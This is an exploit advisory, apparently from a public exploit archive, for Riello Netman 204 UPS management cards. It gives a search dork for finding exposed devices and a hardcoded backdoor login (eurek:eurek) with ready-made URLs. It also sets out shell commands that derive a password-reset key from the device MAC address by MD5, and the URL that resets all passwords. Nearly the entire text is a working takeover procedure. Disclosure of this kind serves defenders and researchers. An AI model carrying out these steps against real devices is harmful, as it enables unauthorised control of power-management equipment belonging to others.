Netman 204 Backdoor / Password Reset
Posted on 01 February 2017
# Exploit Title: Netman 204 Backdoor and weak password recovery function # Google Dork: intitle:"Netman 204 login" # Date: 31st Jan 2017 # Exploit Author: Simon Gurney # Vendor Homepage: blog.synack.co.uk # Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip # Version: S14-1 and S15-2 # Tested on: Reillo UPS # CVE : N/A Netman 204 cards have a backdoor account eurek:eurek. This account can be logged with by simply browsing to the URL http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek or https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek Due to flaws in parameter validation, the URL can be shortened to: http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek or https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet: NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' ` KEY=`echo .$NETMANID | md5sum | cut -c2-10` To generate the key, do an MD5 hash of 204:[MAC ADDRESS] Such as, 204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab Then take characters 2-10, where position 1 is character 1 (not 0). Such as, 354a65581 Then browse to the url: http://[ip]/cgi-bin/recover2.cgi?password=354a65581 or https://[ip]/cgi-bin/recover2.cgi?password=354a65581 Passwords have now been reset.